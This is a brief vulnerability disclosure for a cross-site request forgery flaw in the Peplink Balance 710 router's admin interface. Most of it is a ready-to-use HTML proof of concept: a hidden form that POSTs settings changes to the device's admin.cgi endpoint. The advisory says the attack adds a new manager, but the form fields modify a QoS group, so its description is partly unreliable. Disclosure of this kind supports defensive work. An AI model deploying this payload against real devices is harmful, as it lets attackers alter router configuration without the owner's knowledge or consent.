Paperlink Balance 710 Cross Site Request Forgery

??# Affected software: paperlink balance 710
# Type of vulnerability:csrf
# URL:peplink.com <http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi>
# Discovered by: provensec
# Website: provensec.com

#version:710
# Proof of concept?

a new manager can be added using csrf attack

<html>

  <body>
    <form action="http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi"
method="POST">
      <input type="hidden" name="section" value="EQOS&#95;group&#95;modify"
/>
      <input type="hidden" name="rule&#95;id" value="" />
      <input type="hidden" name="iptype" value="0" />
      <input type="hidden" name="ipaddr" value="123&#46;123&#46;1&#46;23" />
      <input type="hidden" name="netmask" value="24" />
      <input type="hidden" name="group" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>?